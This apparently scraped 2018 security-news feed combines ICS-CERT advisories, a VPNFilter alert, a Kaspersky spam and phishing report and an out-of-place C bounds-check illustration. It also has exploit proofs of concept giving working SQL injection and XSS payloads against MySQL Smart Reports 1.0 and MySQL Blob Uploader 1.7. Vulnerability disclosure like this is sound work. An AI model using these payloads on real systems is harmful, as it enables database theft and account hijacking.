BeaconMedaes TotalAlert Scroll Medical Air Systems

1. EXECUTIVE SUMMARY

  • CVSS v3 7.5
  • ATTENTION: Exploitable remotely/low skill level to exploit
  • Vendor: BeaconMedaes
  • Equipment: TotalAlert Scroll Medical Air Systems web application
  • Vulnerabilities: Improper Access Control, Insufficiently Protected Credentials, Unprotected Storage of Credentials

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to view and potentially modify some device information and web application setup information, which does not include access to patient health information. Additionally, BeaconMedaes has stated that a successful attacker would not be able to affect the ability of the device to operate as designed for the purpose of delivering medical air in compliance with the NFPA 99 standard for healthcare facilities.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following TotalAlert Scroll Medical Air Systems web applications are affected:

  • TotalAlert Scroll Medical Air Systems running software Versions 4107600010.23 and prior.

3.2 VULNERABILITY OVERVIEW

3.2.2 INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522

An attacker with network access to the integrated web server could retrieve default or user defined credentials stored and transmitted in an insecure manner.

CVE-2018-7518 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

3.2.3 UNPROTECTED STORAGE OF CREDENTIALS CWE-256

Passwords are presented in plaintext in a file that is accessible without authentication.

CVE-2018-7515 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

3.3 BACKGROUND

  • Critical Infrastructure Sectors: Healthcare and Public Health
  • Countries/Areas Deployed: Worldwide
  • Company Headquarters Location: U.S.

3.4 RESEARCHER

Maxim Rupp reported these vulnerabilities to NCCIC.

4. MITIGATIONS

BeaconMedaes has stated that the vulnerabilities do not compromise either patient health information or compliance with the NFPA 99 standard for healthcare facilities. To address these vulnerabilities, BeaconMedaes has created update 4107600010.24 and recommends that users of the TotalAlert Scroll Medical Air Systems update to this version or the latest release. BeaconMedaes recommends that affected users reach out to BeaconMedaes directly at 1-888-4MEDGAS (463-3427) to obtain this update.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

Schneider Electric Floating License Manager

1. EXECUTIVE SUMMARY

  • CVSS v3 9.8
  • ATTENTION: Remotely exploitable/low skill level to exploit
  • Vendor: Schneider Electric
  • Equipment: Floating License Manager
  • Vulnerabilities: Heap-based Buffer Overflow, Improper Restriction of Operations within the Bounds of a Memory Buffer, Open Redirect

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could cause a denial of service, allow arbitrary execution of code with system level privileges, or send users to arbitrary websites.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following products use the vulnerable Schneider Electric Floating License Manager, a license management platform:

  • SCADA Expert Vijeo Citect / CitectSCADA Version 7.30, 7.40,
  • CitectSCADA Version 2015, 2016,
  • Vijeo Historian/CitectHistorian Version 4.40, 4.50,
  • CitectHistorian Version 2016,
  • Citect Anywhere,
  • PlantStruxure PES V4.3 SP1 and prior, and
  • EcoStruxure Modicon Builder V3.0 and prior.

The following products are only affected by CVE-2016-10395:

  • EcoStruxure Power Monitoring Expert 8.2 (Standard, DC, HC Editions),
  • StruxureWare Power Monitoring Expert 8.1 (Standard, DC, HC Editions),
  • StruxureWare Power Monitoring Expert 8.0 (Standard, DC, HC, Buildings Editions),
  • StruxureWare Power Monitoring Expert 7.2.x,
  • Energy Expert 1.x (formerly Power Manager), and
  • EcoStruxure Power SCADA Operations 8.x (formerly PowerSCADA Expert) (Only with Advanced Reports and Dashboards Module).

3.2 VULNERABILITY OVERVIEW

3.2.1 HEAP-BASED BUFFER OVERFLOW CWE-122

OpenSSL incorrectly uses pointer arithmetic for heap-buffer boundary checks, which may allow denial of service attacks or other unspecified behavior.

CVE-2016-2177 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
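The bug class named above, shown as an added illustration (this is not OpenSSL's code, and the function and buffer names are hypothetical): a bounds check that forms `p + need` before comparing can create a pointer outside the allocation, which C leaves undefined and which can wrap around on real hardware, while comparing the remaining length against the requested size never forms such a pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not OpenSSL's code. Both functions answer the same
 * question: do `need` more bytes fit between cursor `p` and `end`? */

/* Pattern the advisory describes: advance the pointer first, then compare.
 * When `need` is large, `p + need` lies outside the buffer. Forming that
 * pointer is undefined behaviour; in practice the address may wrap and the
 * comparison wrongly reports that the bytes fit. */
static int fits_pointer_arith(const unsigned char *p, size_t need,
                              const unsigned char *end)
{
    return p + need <= end;   /* out-of-bounds pointer formed before the check */
}

/* Safe pattern: subtract two pointers that are both inside (or one past)
 * the buffer to get the remaining length, then compare sizes. No pointer
 * outside the allocation is ever computed, whatever `need` is. */
static int fits_length_check(const unsigned char *p, size_t need,
                             const unsigned char *end)
{
    if (p > end)
        return 0;
    size_t remaining = (size_t)(end - p);
    return need <= remaining;
}

/* Toy parser for a length-prefixed field (one length byte, then that many
 * value bytes), the kind of code where such checks sit. Returns the field
 * length and sets *value_out on success, -1 if the claimed length does not
 * fit in the bytes remaining. Uses only the safe check. */
static int read_len_prefixed(const unsigned char *buf, size_t buflen,
                             const unsigned char **value_out)
{
    const unsigned char *p = buf;
    const unsigned char *end = buf + buflen;   /* one past the end: valid */

    if (!fits_length_check(p, 1, end))
        return -1;
    size_t claimed = *p++;
    if (!fits_length_check(p, claimed, end))
        return -1;                             /* truncated or malicious field */
    *value_out = p;
    return (int)claimed;
}

int main(void)
{
    /* Constructed sample inputs */
    unsigned char good[] = {3, 'a', 'b', 'c'};
    unsigned char bad[]  = {200, 'a', 'b'};    /* claims 200 bytes, 2 present */
    const unsigned char *v;

    printf("good field length: %d\n", read_len_prefixed(good, sizeof good, &v));
    printf("bad field length:  %d\n", read_len_prefixed(bad, sizeof bad, &v));
    return 0;
}
```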

3.2.2 IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119

This vulnerability can be exploited to cause an out-of-bounds memory read access, which may allow remote code execution with system privileges.

CVE-2016-10395 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

3.2.3 URL REDIRECTION TO UNTRUSTED SITE (‘OPEN REDIRECT’) CWE-601

An open redirect vulnerability has been identified, which may allow remote attackers to redirect users to arbitrary websites for phishing attacks.

CVE-2017-5571 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

3.3 BACKGROUND

  • Critical Infrastructure Sectors: Commercial Facilities, Energy, Food and Agriculture, Government Facilities, Transportation Systems, Water and Wastewater Systems
  • Countries/Areas Deployed: Worldwide
  • Company Headquarters Location: France

3.4 RESEARCHER

Schneider Electric reported these vulnerabilities to NCCIC.

4. MITIGATIONS

Schneider Electric recommends that users of affected Citect and PlantStruxure products download and install the new version of the software located at:

https://www.citect.schneider-electric.com/documents/downloads/Floating_License_Manager_v2.1.0.0.zip

Users using EcoStruxure Modicon Builder V3.0 are recommended to download and use the new version (V3.1) located at:

https://partner.schneider-electric.com/partners/Menu/MyPartnership (login required)

StruxureWare 7.2.x users should upgrade to Version 7.2.2 and apply the Floating License Manager (FLM) patch from the following location:

https://schneider-electric.box.com/s/n2fh1ym594pqvl87kf0zjsigamuryrje

EcoStruxure/StruxureWare Power Monitoring Expert and Power SCADA Operations users need to upgrade to Version 8.2. Energy Expert users need to upgrade to Version 1.3. Once these are upgraded, apply the Cumulative Update (CU) 2 located at:

https://schneider-electric.box.com/s/kkdikodcksjj1dznqy68ko0j28wct7vb

Schneider Electric has also released security notifications which contain further details and upgrade instructions at the following links:

https://www.citect.schneider-electric.com/safety-and-security-central/36-security-notifications/9134-vulnerabilities-within-schneider-electric-floating-license-manager

https://www.schneider-electric.com/en/download/document/SEVD-2018-137-01/

https://www.schneider-electric.com/en/download/document/SEVD-2018-144-01/

https://www.schneider-electric.com/en/download/document/SEVD-2018-046-01/

NCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

FBI Releases Article on Building a Digital Defense with Credit Reports

Original release date: May 23, 2018

FBI has released an article on using credit reports to build a digital defense against identity theft. FBI explains how identity theft can deal a devastating blow to consumers’ credit history. However, regularly checking the accuracy of credit reports can help consumers minimize risk.

NCCIC encourages consumers to review the FBI Article and NCCIC’s Tip on Preventing and Responding to Identity Theft.


This product is provided subject to this Notification and this Privacy & Use policy.

MySQL Smart Reports 1.0 Cross Site Scripting / SQL Injection

# Exploit Title: MySQL Smart Reports 1.0 – SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : It is actually a POST request sent by the user to update.
You do not need to use POST data. You can inject via the
GET method as well.
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
Payload : add=true&id=9′ RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE
0x28 END))– YVFC

Type : error-based
Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
Payload : add=true&id=9′ AND (SELECT 3635 FROM(SELECT
COUNT(*),CONCAT(0x716a6a7671,(SELECT
(ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– HEMo

Type : AND/OR time-based blind
Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
Payload : add=true&id=9′ AND SLEEP(5)– mcFO

====================================================
# PoC : XSS :

Payload :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=’
</script><script>alert(1)</script>a;

VPNFilter Destructive Malware

Original release date: May 23, 2018

NCCIC is aware of a sophisticated modular malware system known as VPNFilter. Devices known to be affected by VPNFilter include Linksys, MikroTik, NETGEAR, and TP-Link networking equipment, as well as QNAP network-attached storage (NAS) devices. Devices compromised by VPNFilter may be vulnerable to the collection of network traffic (including website credentials), as well as the monitoring of Modbus supervisory control and data acquisition (SCADA) protocols.

VPNFilter has a destructive capability that can make the affected device unusable. Because the malware can be triggered to affect devices individually or multiple devices at once, VPNFilter has the potential to cut off internet access for hundreds of thousands of users.

NCCIC encourages users and administrators to review the Cisco blog post on VPNFilter for recommendations and to ensure that their devices are updated with the latest patches. NCCIC will provide updated information as it becomes available.


MySQL Blob Uploader 1.7 Cross Site Scripting / SQL Injection

————————-
Exploit 1 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘download.php’ SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali Linux
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44′ AND 4775=4775 AND ‘yvnT’=’yvnT&t=files

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44′ AND (SELECT 7995 FROM(SELECT
COUNT(*),CONCAT(0x71766b7071,(SELECT
(ELT(7995=7995,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘VOHb’=’VOHb&t=files

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44′ AND SLEEP(5) AND ‘GnhY’=’GnhY&t=files

Type : UNION query
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=-9508′ UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x6267544b5552795353544744426577526b47544d477553476d576442544152546e4a456b586c726d,0x71786b7671),NULL–
wxis&t=files

Parameter : t

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 6575=6575 AND 6608=6608#

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 5293=5293 AND (SELECT 1625 FROM(SELECT
COUNT(*),CONCAT(0x71766b7071,(SELECT
(ELT(1625=1625,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– OpVv

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/download.php?id=44&t=files
Payload : id=44&t=files` WHERE 6736=6736 AND (SELECT * FROM
(SELECT(SLEEP(5)))GjCP)– UaZE

====================================================

# PoC : XSS :

Payload(1) :
http://test.com/MySqlBlobUploader/download.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files

Payload(2) :
http://test.com/MySqlBlobUploader/download.php?id=44&t=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;

————————-
Exploit 2 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘home-file-edit.php’ SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali Linux
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42′ AND 5445=5445 AND ‘xkCg’=’xkCg

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42′ AND (SELECT 8740 FROM(SELECT
COUNT(*),CONCAT(0x7178717671,(SELECT
(ELT(8740=8740,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘xWJA’=’xWJA

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=42′ AND SLEEP(5) AND ‘eOfO’=’eOfO

Type : UNION query
Demo :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=42
Payload : id=-4824′ UNION ALL SELECT
CONCAT(0x7178717671,0x4e4448494b6a6457474572704c5a73534661474c6f6b44554a7863754d77565570654c664a634274,0x717a6b7171),NULL,NULL,NULL,NULL,NULL–
aTGd

====================================================

# PoC : XSS :

Payload :
http://test.com/MySqlBlobUploader/home-file-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files

————————-
Exploit 3 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘home-filet-edit.php’ SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali Linux
====================================================

# PoC : SQLi :

Parameter : id

Type : boolean-based blind
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7′ AND 3132=3132 AND ‘erLO’=’erLO

Type : error-based
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7′ AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘JvQj’=’JvQj

Type : AND/OR time-based blind
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=7′ AND SLEEP(5) AND ‘MvuE’=’MvuE

Type : UNION query
Demo :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7
Payload : id=-3399′ UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL–
EcgK

====================================================

# PoC : XSS :

Payload :
http://test.com/MySqlBlobUploader/home-filet-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;

————————-
Exploit 4 of 4:

# Exploit Title: MySQL Blob Uploader 1.7 – ‘home-filet-edit.php’ SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Version: 1.7 – seventh update
# Category: Webapps
# Tested on: Kali Linux

# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=7′ AND 3132=3132 AND ‘erLO’=’erLO

# Type: error-based
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=7′ AND (SELECT 6373 FROM(SELECT
COUNT(*),CONCAT(0x71717a6b71,(SELECT
(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘JvQj’=’JvQj

# Type: AND/OR time-based blind
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=7′ AND SLEEP(5) AND ‘MvuE’=’MvuE

# Type: UNION query
# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7
# Payload:

id=-3399′ UNION ALL SELECT
CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL–
EcgK

Spam and phishing in Q1 2018

Quarterly highlights

Data leaks

Early 2018 will be remembered for a series of data leak scandals. The most high-profile saw Facebook CEO Mark Zuckerberg grilled by US Congress, with many public figures supporting the Delete Facebook campaign. As a result, Zuckerberg promised to get tough and make it more difficult to harvest data from third-party apps.

But the buck doesn’t stop entirely with the tech giants—personal data often ends up in cybercriminal hands due to user carelessness. Some techniques may be timeworn, but one in particular still reels in the victims: Facebook users are one of the juiciest targets for cyberfraudsters looking to launch mass phishing attacks. Last year Facebook was one of the Top 3 most exploited company names. The schemes are numerous, but fairly standard: the user is asked to “verify” an account or lured into signing into a phishing site on the promise of interesting content.

Examples of phishing pages mimicking Facebook login

Fake pages such as these exist in all languages supported by the social media. Sometimes the correct localization is selected automatically based on the victim’s IP address.

Example of code used by cybercriminals to determine the victim’s location and adapt the phishing page

Data often falls into the hands of cybercriminals through third-party apps that users themselves give access to their accounts and sometimes even allow to post messages on their own behalf.

In early March, for instance, several hundred VKontakte users were hit when third parties gained access to their private correspondence. This happened as a result of apps using the social network’s open API to request access to personal data without guaranteeing its safe storage and use.

In the headline-grabbing case of Cambridge Analytica’s This Is Your Digital Life app, users also handed over personal information voluntarily. Carelessness is the culprit: many people are unaware of just how much data they give away in personality quizzes.

Social media quizzes often ask for a lot of user data.

Remember that cybercriminals often use social media to spread malicious content. For example, we wrote about fake airline giveaways, adult video spam, and even an Alberto Suárez phishing petition.

Another major personal data story was the appearance in Russia of the GetContact app for smartphones, which not only tells users who’s calling, but shows the names under which their contacts are saved in other app users’ phone books. For this, the program needs to be fed not just the user’s own data, but the entire address book (photos, email addresses, even conversation history). That earned GetContact a ban in several countries (even before it appeared in Russia).

Telegram, ICOs, cryptocurrencies

In Q1 a battle royale broke out over the Telegram messenger. It all began late last year with talk of an upcoming ICO. That provided the backdrop for cybercriminals to create fake Telegram ICO sites, which by the end of Q1 had allegedly raked in as much as the company’s rumored private ICO.

Fake site offering the chance to participate in the Telegram ICO

That was followed by a wave of phishing mailshots to owners of major Russian channels in Telegram. An account under the name Telegram (or something similar) sent a message informing potential victims that suspicious activity had been detected on their account and that confirmation was required to avoid having it blocked. A link was provided to a phishing site masquerading as the login page for the web version of Telegram.

Phishing site mimicking the web version of the Telegram app

If the victim agreed to fill out the form, the cybercriminals gained access to their account, plus the ability to link it to another phone number.

Another spike in scamming activity was recorded when the Internet was buzzing about the imminent takedown of the messenger in Russia. And when the messenger suffered a power outage in a server cluster, it was widely perceived as the start of the ban. Replying to Pavel Durov’s tweet about the malfunction, enterprising cybercriminals offered compensation on his behalf in cryptocurrency. To claim it, users had to follow a link to a site where they were asked to transfer a sum of money to a specified wallet number to receive their “compensation.”

But Telegram does not have a monopoly over the cryptocurrency topic this quarter. We repeatedly encountered phishing sites and email messages exploiting the launch of new ICOs. Cryptocurrency scams often bring in millions of dollars, which explains why cybercriminals are so fond of them.

For instance, on January 31–February 2 the Bee Token startup held an ICO for which participants had to register in advance on the project website, specifying their email address. Cybercriminals managed to get hold of a list of email addresses of potential investors and send out a timely invitation containing e-wallet details for making Ethereum-based investments.

Phishing email supposedly sent from the ICO organizers

123.3275 ether were transferred to this wallet (around $84,162.37). Fraudsters also set up several phishing sites under the guise of the platform’s official site.

A similar scam occurred with the Buzzcoin ICO. The project website invited users to subscribe to a newsletter by leaving an email address. The day before the official ICO start, subscribers received a fraudulent message about the start of pre-sales with a list of cryptowallets to which money should be transferred.

Phishing email supposedly sent from the ICO organizers

Cybercriminals scooped about $15,000 before the organizers took action.

GDPR

One measure that addresses user safety is the General Data Protection Regulation (GDPR), a general policy on the protection and privacy of individuals. This EU regulation has a direct bearing on all companies that process data belonging to EU residents, and therefore has an international scope. The GDPR becomes enforceable on May 25 this year and stipulates large fines (up to EUR 20 million or 4% of annual revenue) for companies whose information activity does not comply with the regulation.

Such a landmark event in the IT world could hardly fail to attract cybercriminals, and in recent months (since the end of last year) we have registered a large number of spam emails related one way or another to the GDPR. It is generally B2B spam—mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

We also came across spam offers to install on the target company’s main website or landing page special fee-based software providing web resources with everything necessary to comply with the new rules. Moreover, the site owner would supposedly be insured against problems relating to user data security.

Spam traffic also contained offers to acquire ready-made specialized databases of individuals and legal entities broken down by business division or other criteria. The sellers had no scruples about stressing that all addresses and contacts for sale were already GDPR-compliant. In fact, harvesting user data and reselling it to third parties without the consent of the owners and data carriers violates not only this regulation, but also the law in general.

Example of a spam message exploiting the GDPR topic

Note that legitimate mailers also became more active. They are already sending notices to users describing the new rules and asking for consent to use and process their data under the new policy. When the new regulation enters into force, the number of such notices will skyrocket, so we predict a surge in scam mailings aimed at obtaining personal info and authentication data for access to various accounts. We urge users to pay close attention to the new regulation and carefully study any notifications related to it. Links should be checked before clicking: they should not contain redirects to third-party sites or domains unrelated to the service on whose behalf the message was sent.

Political spam

In the runup to the Russian presidential elections, we observed a range of political spam, including messages promoting or slurring various candidates. The election topic was used for fraud: cybercriminals sent email messages offering a financial reward for taking part in public opinion polls, as a result of which money ended up being transferred in the opposite direction.

Example of a message inviting recipients to take part in a poll

Phishing for taxpayers

Every country has its own tax year, but as a rule the most active period for dealing with tax services comes at the start of the year. In Q1 we registered many phishing pages mimicking the IRS, HMRC, and other countries’ tax services.

Fake tax service websites

Spam-based malware

Back in Q1 2017 we wrote about a mailout disguised as a resume concealing a malicious file from the Fareit Trojan spyware family. In the same quarter of 2018, cybercriminals attempted to infect users’ computers with the Smoke Loader backdoor, also known as Dofoil. Its toolbox includes downloading and installing malware such as cryptocurrency miners, banking Trojans, and ransomware. Smoke Loader could also disable some antivirus software and hide from detection by integrating itself into system processes.

The text of the malicious mailshot varied, with some messages imitating the business correspondence of real company employees. To open the password-protected DOC attachment, the user had to enter the password specified in the message, which triggered a request to enable macros (disabled by default); confirmation proved fatal for message recipients. We observed a trend for password-protected malicious attachments in Q1 2018: such protection hinders detection and increases the chances that the message will reach the recipient.

Examples of emails with malicious attachments

Another long-established social engineering method exploits user fears of infection, data leakage, access denial, and other bugbears. In Q1, this old trick was used to dupe users into parting with cryptocurrency. Most messages tried to scare recipients by reporting that malware was installed on their computer and that personal info (lists of contacts, monitor screenshots, webcam videos, etc.) was compromised. If the scammers didn’t receive a hush payment, it was said, the harvested information would be sent to all the victim’s contacts.

Example of a message with a ransom demand in exchange for not publicizing the victim’s personal data

Some messages from cybercriminals tried not only to extract money, but to install malware on recipients’ computers. The malware was located in a protected archive attachment that the attackers claimed was proof that they had the victim’s data.

Malware under the guise of proving cybercriminal intent

Statistics: spam

Proportion of spam in email traffic

Proportion of spam in global email traffic, Q4 2017 and Q1 2018

In Q1 2018, the largest share of spam was recorded in January (54.50%). The average share of spam in global email traffic was 51.82%, down 4.63 p.p. against the figure for Q4 2017.

Sources of spam by country

Sources of spam by country, Q1 2018

Q1 2018 results put Vietnam (9.22%) top of the leaderboard of spam sources by country. In second place, just 0.64 p.p. behind, came the US (8.55%). The rating’s frequent leader China (7.87%) slipped to third, while India (7.10%) and Germany (6.35%) claimed fourth and fifth. The Top 10 is rounded off by Iran (2.51%).

Spam email size

Spam email size, Q4 2017 and Q1 2018

In Q1 2018, the share of very small emails (up to 2 KB) in spam increased by 19.79 p.p. to 81.62%. Meanwhile, the proportion of emails between 5 and 10 KB in size fell (by 6.05 p.p.) against the previous quarter to 4.11%.

The number of emails between 10 and 20 KB also decreased (by 4.91 p.p.). Likewise, there were fewer emails sized 20 to 50 KB—this quarter they made up just 2.72% of the total, which represents a drop of 6.81 p.p. compared to the previous reporting period.

Malicious attachments in email

Top 10 malware families

Top 10 malware families, Q1 2018

The most widespread malware family in email traffic this quarter was Trojan-PSW.Win32.Fareit (7.01%), with Backdoor.Java.QRat (6.71%) and Worm.Win32.WBVB (5.75%) completing the Top 3. Fourth place went to Backdoor.Win32.Androm (4.41%), and Trojan.PDF.Badur (3.56%) rounds off the Top 5.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggers by country, Q1 2018

Germany (14.67%) was this quarter’s leader by number of Mail Anti-Virus triggers, followed by Russia on 6.37% and Britain with a score of 5.43%. Fourth and fifth positions were occupied by Italy (5.40%) and the UAE (4.30%).

Statistics: phishing

In Q1 2018, the Anti-Phishing module prevented 90,245,060 attempts to direct users to scam websites. The share of unique users attacked made up 9.6% of all users of Kaspersky Lab products worldwide.

Geography of attacks

The country with the largest percentage of users affected by phishing attacks in Q1 2018 was Brazil (19.07%, -1.72 p.p.).

Geography of phishing attacks*, Q1 2018

 * Number of users on whose computers Anti-Phishing was triggered as a percentage of the total number of Kaspersky Lab users in that country

Second came Argentina (13.30%), and third place was taken by Venezuela (12.90%). Fourth and fifth went to Albania (12.56%) and Bolivia (12.32%).

Country %
Brazil 19.07
Argentina 13.30
Venezuela 12.90
Albania 12.56
Bolivia 12.32
Réunion 11.88
Belarus 11.62
Georgia 11.56
France 11.40
Portugal 11.26

Top 10 countries by percentage of users attacked by phishers

Organizations under attack

Rating of categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2018, the Global Internet Portals category again took first place with 23.7% (-2.56 p.p.).

Distribution of organizations affected by phishing attacks by category, Q1 2018

